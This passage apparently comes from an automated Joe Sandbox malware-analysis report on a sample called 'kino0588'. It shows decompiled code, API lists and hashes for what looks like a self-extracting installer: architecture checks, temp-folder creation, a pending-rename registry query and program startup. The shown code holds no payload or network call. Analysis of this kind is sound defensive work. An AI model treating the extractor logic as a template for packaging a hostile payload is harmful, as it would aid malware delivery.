				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0019658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                                                    0x00195472
                                                                                                                                                                                                                                    0x00195479
                                                                                                                                                                                                                                    0x00195481
                                                                                                                                                                                                                                    0x00195484
                                                                                                                                                                                                                                    0x0019551c
                                                                                                                                                                                                                                    0x00195521
                                                                                                                                                                                                                                    0x00195528
                                                                                                                                                                                                                                    0x0019552d
                                                                                                                                                                                                                                    0x0019552f
                                                                                                                                                                                                                                    0x00195539
                                                                                                                                                                                                                                    0x0019554d
                                                                                                                                                                                                                                    0x0019554d
                                                                                                                                                                                                                                    0x00195552
                                                                                                                                                                                                                                    0x00195585
                                                                                                                                                                                                                                    0x00195585
                                                                                                                                                                                                                                    0x0019558b
                                                                                                                                                                                                                                    0x0019558d
                                                                                                                                                                                                                                    0x0019559d
                                                                                                                                                                                                                                    0x0019559d
                                                                                                                                                                                                                                    0x00195557
                                                                                                                                                                                                                                    0x0019555e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195560
                                                                                                                                                                                                                                    0x00195566
                                                                                                                                                                                                                                    0x00195569
                                                                                                                                                                                                                                    0x0019556f
                                                                                                                                                                                                                                    0x0019556f
                                                                                                                                                                                                                                    0x00195581
                                                                                                                                                                                                                                    0x00195581
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195581
                                                                                                                                                                                                                                    0x00195545
                                                                                                                                                                                                                                    0x0019557c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019557c
                                                                                                                                                                                                                                    0x00195547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195547
                                                                                                                                                                                                                                    0x0019548a
                                                                                                                                                                                                                                    0x00195490
                                                                                                                                                                                                                                    0x00195497
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019549d
                                                                                                                                                                                                                                    0x001954ab
                                                                                                                                                                                                                                    0x001954b4
                                                                                                                                                                                                                                    0x001954c0
                                                                                                                                                                                                                                    0x0019550c
                                                                                                                                                                                                                                    0x00195511
                                                                                                                                                                                                                                    0x00195515
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195515
                                                                                                                                                                                                                                    0x001954c9
                                                                                                                                                                                                                                    0x001954d6
                                                                                                                                                                                                                                    0x001954d8
                                                                                                                                                                                                                                    0x001954fe
                                                                                                                                                                                                                                    0x00195503
                                                                                                                                                                                                                                    0x00195507
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195507
                                                                                                                                                                                                                                    0x001954da
                                                                                                                                                                                                                                    0x001954dd
                                                                                                                                                                                                                                    0x001954f7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001954f7
                                                                                                                                                                                                                                    0x001954df
                                                                                                                                                                                                                                    0x001954e2
                                                                                                                                                                                                                                    0x001954f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001954f0
                                                                                                                                                                                                                                    0x001954e7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001954e9
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 001954C9
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019553D
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019556F
                                                                                                                                                                                                                                      • Part of subcall function 001953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 001953FB
                                                                                                                                                                                                                                      • Part of subcall function 001953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195402
                                                                                                                                                                                                                                      • Part of subcall function 001953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019541F
                                                                                                                                                                                                                                      • Part of subcall function 001953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019542B
                                                                                                                                                                                                                                      • Part of subcall function 001953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195434
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                    • API String ID: 1979080616-4185119251
                                                                                                                                                                                                                                    • Opcode ID: d3db6ba87cfbac4e157185a31503a2f0950b41540435e91396bf2f411fcec221
                                                                                                                                                                                                                                    • Instruction ID: 806569d0a94373c526c06d621105b65960a9c4ee46c9de75756e42a7681dbbb5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3db6ba87cfbac4e157185a31503a2f0950b41540435e91396bf2f411fcec221
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB313870B00A016BEF169F399C4457E77ABBB95350B06016BB806F3551DB70CE818796
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0019256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 519 19256d-19257d 520 192583-192589 519->520 521 192622-192627 call 1924e0 519->521 523 1925e8-192607 RegOpenKeyExA 520->523 524 19258b 520->524 526 192629-19262f 521->526 528 192609-192620 RegQueryInfoKeyA 523->528 529 1925e3-1925e6 523->529 524->526 527 192591-192595 524->527 527->526 531 19259b-1925ba RegOpenKeyExA 527->531 530 1925d1-1925dd RegCloseKey 528->530 529->526 530->529 531->529 532 1925bc-1925cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E0019256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E001924E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                                                    0x00192572
                                                                                                                                                                                                                                    0x00192573
                                                                                                                                                                                                                                    0x00192575
                                                                                                                                                                                                                                    0x00192578
                                                                                                                                                                                                                                    0x0019257d
                                                                                                                                                                                                                                    0x00192627
                                                                                                                                                                                                                                    0x00192583
                                                                                                                                                                                                                                    0x00192586
                                                                                                                                                                                                                                    0x00192589
                                                                                                                                                                                                                                    0x001925eb
                                                                                                                                                                                                                                    0x00192607
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192609
                                                                                                                                                                                                                                    0x0019261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019258b
                                                                                                                                                                                                                                    0x0019258b
                                                                                                                                                                                                                                    0x0019259e
                                                                                                                                                                                                                                    0x001925b2
                                                                                                                                                                                                                                    0x001925ba
                                                                                                                                                                                                                                    0x001925cb
                                                                                                                                                                                                                                    0x001925d1
                                                                                                                                                                                                                                    0x001925d6
                                                                                                                                                                                                                                    0x001925da
                                                                                                                                                                                                                                    0x001925dd
                                                                                                                                                                                                                                    0x001925dd
                                                                                                                                                                                                                                    0x001925e3
                                                                                                                                                                                                                                    0x001925e3
                                                                                                                                                                                                                                    0x001925e3
                                                                                                                                                                                                                                    0x0019258b
                                                                                                                                                                                                                                    0x00192589
                                                                                                                                                                                                                                    0x0019262f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00194096,00194096,?,00191ED3,00000001,00000000,?,?,00194137,?), ref: 001925B2
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00194096,?,00191ED3,00000001,00000000,?,?,00194137,?,00194096), ref: 001925CB
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00191ED3,00000001,00000000,?,?,00194137,?,00194096), ref: 001925DD
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00194096,00194096,?,00191ED3,00000001,00000000,?,?,00194137,?), ref: 001925FF
                                                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00194096,00000000,00000000,00000000,00000000,?,00191ED3,00000001,00000000), ref: 0019261A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 001925A8
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001925F5
                                                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 001925C3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                    • Opcode ID: a57ef4380cb766129228ef820b8f2ef235832d5f761d4e7d9ff5afc7e23b5dd7
                                                                                                                                                                                                                                    • Instruction ID: fd9d5236b31b0756cf4bfbb231bf3db7699c5f3fd4bb4ed034f1a87839b20427
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a57ef4380cb766129228ef820b8f2ef235832d5f761d4e7d9ff5afc7e23b5dd7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99114F35942228BBEF209B919C09DFBBE7CEF167A1F554056F808E2011DB305E49D6E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00196A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 533 196a60-196a91 call 197155 call 197208 GetStartupInfoW 539 196a93-196aa2 533->539 540 196abc-196abe 539->540 541 196aa4-196aa6 539->541 544 196abf-196ac5 540->544 542 196aa8-196aad 541->542 543 196aaf-196aba Sleep 541->543 542->544 543->539 545 196ad1-196ad7 544->545 546 196ac7-196acf _amsg_exit 544->546 548 196ad9-196ae9 call 196c3f 545->548 549 196b05 545->549 547 196b0b-196b11 546->547 551 196b2e-196b30 547->551 552 196b13-196b24 _initterm 547->552 553 196aee-196af2 548->553 549->547 554 196b3b-196b42 551->554 555 196b32-196b39 551->555 552->551 553->547 558 196af4-196b00 553->558 556 196b44-196b51 call 197060 554->556 557 196b67-196b71 554->557 555->554 556->557 566 196b53-196b65 556->566 560 196b74-196b79 557->560 561 196c39-196c3e call 19724d 558->561 563 196b7b-196b7d 560->563 564 196bc5-196bc8 560->564 569 196b7f-196b81 563->569 570 196b94-196b98 563->570 567 196bca-196bd3 564->567 568 196bd6-196be3 _ismbblead 564->568 566->557 567->568 572 196be9-196bed 568->572 573 196be5-196be6 568->573 569->564 574 196b83-196b85 569->574 575 196b9a-196b9e 570->575 576 196ba0-196ba2 570->576 572->560 579 196c1e-196c25 572->579 573->572 574->570 580 196b87-196b8a 574->580 577 196ba3-196bbc call 192bfb 575->577 576->577 577->579 586 196bbe-196bbf exit 577->586 582 196c32 579->582 583 196c27-196c2d _cexit 579->583 580->570 584 196b8c-196b92 580->584 582->561 583->582 584->574 586->564
                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00197155();
				_push(0x58);
				_push(0x1972b8);
				E00197208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x1988b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x1988b0; // 0x2
						if(__eflags != 0) {
							 *0x1981e4 = _t58;
							goto L13;
						} else {
							 *0x1988b0 = _t58;
							_t37 = E00196C3F(0x1910b8, 0x1910c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00196FF4();
						L13:
						_t68 =  *0x1988b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x1910b4);
							_push(0x1910ac);
							L00197202();
							 *0x1988b0 = 2;
						}
						if(_t53 == 0) {
							 *0x1988ac = 0;
						}
						_t71 =  *0x1988b4;
						if( *0x1988b4 != 0 && E00197060(_t71, 0x1988b4) != 0) {
							_t60 =  *0x1988b4; // 0x0
							 *0x19a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00192BFB(0x190000, 0, _t59); // executed
							 *0x1981e0 = _t30;
							__eflags =  *0x1981f8;
							if( *0x1981f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x1981e4;
							if( *0x1981e4 == 0) {
								__imp___cexit();
								_t30 =  *0x1981e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0019724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                                                    0x00196a60
                                                                                                                                                                                                                                    0x00196a6a
                                                                                                                                                                                                                                    0x00196a6c
                                                                                                                                                                                                                                    0x00196a71
                                                                                                                                                                                                                                    0x00196a78
                                                                                                                                                                                                                                    0x00196a7f
                                                                                                                                                                                                                                    0x00196a85
                                                                                                                                                                                                                                    0x00196a8e
                                                                                                                                                                                                                                    0x00196a91
                                                                                                                                                                                                                                    0x00196a93
                                                                                                                                                                                                                                    0x00196a9c
                                                                                                                                                                                                                                    0x00196aa2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196aa6
                                                                                                                                                                                                                                    0x00196ab4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196aa8
                                                                                                                                                                                                                                    0x00196aaa
                                                                                                                                                                                                                                    0x00196aab
                                                                                                                                                                                                                                    0x00196aab
                                                                                                                                                                                                                                    0x00196abf
                                                                                                                                                                                                                                    0x00196abf
                                                                                                                                                                                                                                    0x00196ac5
                                                                                                                                                                                                                                    0x00196ad1
                                                                                                                                                                                                                                    0x00196ad7
                                                                                                                                                                                                                                    0x00196b05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196ad9
                                                                                                                                                                                                                                    0x00196ad9
                                                                                                                                                                                                                                    0x00196ae9
                                                                                                                                                                                                                                    0x00196af0
                                                                                                                                                                                                                                    0x00196af2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196af4
                                                                                                                                                                                                                                    0x00196af4
                                                                                                                                                                                                                                    0x00196afb
                                                                                                                                                                                                                                    0x00196afb
                                                                                                                                                                                                                                    0x00196af2
                                                                                                                                                                                                                                    0x00196ac7
                                                                                                                                                                                                                                    0x00196ac7
                                                                                                                                                                                                                                    0x00196ac9
                                                                                                                                                                                                                                    0x00196b0b
                                                                                                                                                                                                                                    0x00196b0b
                                                                                                                                                                                                                                    0x00196b11
                                                                                                                                                                                                                                    0x00196b13
                                                                                                                                                                                                                                    0x00196b18
                                                                                                                                                                                                                                    0x00196b1d
                                                                                                                                                                                                                                    0x00196b24
                                                                                                                                                                                                                                    0x00196b24
                                                                                                                                                                                                                                    0x00196b30
                                                                                                                                                                                                                                    0x00196b39
                                                                                                                                                                                                                                    0x00196b39
                                                                                                                                                                                                                                    0x00196b3b
                                                                                                                                                                                                                                    0x00196b42
                                                                                                                                                                                                                                    0x00196b57
                                                                                                                                                                                                                                    0x00196b5f
                                                                                                                                                                                                                                    0x00196b65
                                                                                                                                                                                                                                    0x00196b65
                                                                                                                                                                                                                                    0x00196b67
                                                                                                                                                                                                                                    0x00196b6c
                                                                                                                                                                                                                                    0x00196b6e
                                                                                                                                                                                                                                    0x00196b71
                                                                                                                                                                                                                                    0x00196b74
                                                                                                                                                                                                                                    0x00196b74
                                                                                                                                                                                                                                    0x00196b79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196b7d
                                                                                                                                                                                                                                    0x00196b81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196b83
                                                                                                                                                                                                                                    0x00196b8c
                                                                                                                                                                                                                                    0x00196b8d
                                                                                                                                                                                                                                    0x00196b90
                                                                                                                                                                                                                                    0x00196b90
                                                                                                                                                                                                                                    0x00196b83
                                                                                                                                                                                                                                    0x00196b81
                                                                                                                                                                                                                                    0x00196b94
                                                                                                                                                                                                                                    0x00196b98
                                                                                                                                                                                                                                    0x00196ba2
                                                                                                                                                                                                                                    0x00196b9a
                                                                                                                                                                                                                                    0x00196b9a
                                                                                                                                                                                                                                    0x00196b9a
                                                                                                                                                                                                                                    0x00196ba3
                                                                                                                                                                                                                                    0x00196bab
                                                                                                                                                                                                                                    0x00196bb0
                                                                                                                                                                                                                                    0x00196bb5
                                                                                                                                                                                                                                    0x00196bbc
                                                                                                                                                                                                                                    0x00196bbf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196bbf
                                                                                                                                                                                                                                    0x00196c1e
                                                                                                                                                                                                                                    0x00196c25
                                                                                                                                                                                                                                    0x00196c27
                                                                                                                                                                                                                                    0x00196c2d
                                                                                                                                                                                                                                    0x00196c2d
                                                                                                                                                                                                                                    0x00196c32
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196bc5
                                                                                                                                                                                                                                    0x00196bc5
                                                                                                                                                                                                                                    0x00196bc8
                                                                                                                                                                                                                                    0x00196bcc
                                                                                                                                                                                                                                    0x00196bce
                                                                                                                                                                                                                                    0x00196bce
                                                                                                                                                                                                                                    0x00196bd1
                                                                                                                                                                                                                                    0x00196bd3
                                                                                                                                                                                                                                    0x00196bd3
                                                                                                                                                                                                                                    0x00196bd6
                                                                                                                                                                                                                                    0x00196bda
                                                                                                                                                                                                                                    0x00196be1
                                                                                                                                                                                                                                    0x00196be3
                                                                                                                                                                                                                                    0x00196be5
                                                                                                                                                                                                                                    0x00196be5
                                                                                                                                                                                                                                    0x00196be6
                                                                                                                                                                                                                                    0x00196be6
                                                                                                                                                                                                                                    0x00196be9
                                                                                                                                                                                                                                    0x00196bea
                                                                                                                                                                                                                                    0x00196bea
                                                                                                                                                                                                                                    0x00196b74
                                                                                                                                                                                                                                    0x00196c39
                                                                                                                                                                                                                                    0x00196c3e
                                                                                                                                                                                                                                    0x00196c3e
                                                                                                                                                                                                                                    0x00196abe
                                                                                                                                                                                                                                    0x00196abe
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00197155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00197182
                                                                                                                                                                                                                                      • Part of subcall function 00197155: GetCurrentProcessId.KERNEL32 ref: 00197191
                                                                                                                                                                                                                                      • Part of subcall function 00197155: GetCurrentThreadId.KERNEL32 ref: 0019719A
                                                                                                                                                                                                                                      • Part of subcall function 00197155: GetTickCount.KERNEL32 ref: 001971A3
                                                                                                                                                                                                                                      • Part of subcall function 00197155: QueryPerformanceCounter.KERNEL32(?), ref: 001971B8
                                                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,001972B8,00000058), ref: 00196A7F
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00196AB4
                                                                                                                                                                                                                                    • _amsg_exit.MSVCRT ref: 00196AC9
                                                                                                                                                                                                                                    • _initterm.MSVCRT ref: 00196B1D
                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00196B49
                                                                                                                                                                                                                                    • exit.KERNELBASE ref: 00196BBF
                                                                                                                                                                                                                                    • _ismbblead.MSVCRT ref: 00196BDA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 836923961-0
                                                                                                                                                                                                                                    • Opcode ID: 6a9c495f45568dfc8fa3ca2c79c2a3ff608fd2ed9cc96d4c2a8b112998647bb4
                                                                                                                                                                                                                                    • Instruction ID: e94b4b14f60f60705d7bca916d9ae2c3dd78e3d23dc163ffc96b09e3703158fc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a9c495f45568dfc8fa3ca2c79c2a3ff608fd2ed9cc96d4c2a8b112998647bb4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4641DC31A583259FDF259B68DC15B6A77E4FB49720F64012BF842E36D0EB7488818BB1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001958C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 587 1958c8-1958d5 588 1958d8-1958dd 587->588 588->588 589 1958df-1958f1 LocalAlloc 588->589 590 195919-195959 call 191680 call 19658a CreateFileA LocalFree 589->590 591 1958f3-195901 call 1944b9 589->591 594 195906-195910 call 196285 590->594 600 19595b-19596c CloseHandle GetFileAttributesA 590->600 591->594 601 195912-195918 594->601 600->594 602 19596e-195970 600->602 602->594 603 195972-19597b 602->603 603->601
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E001958C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
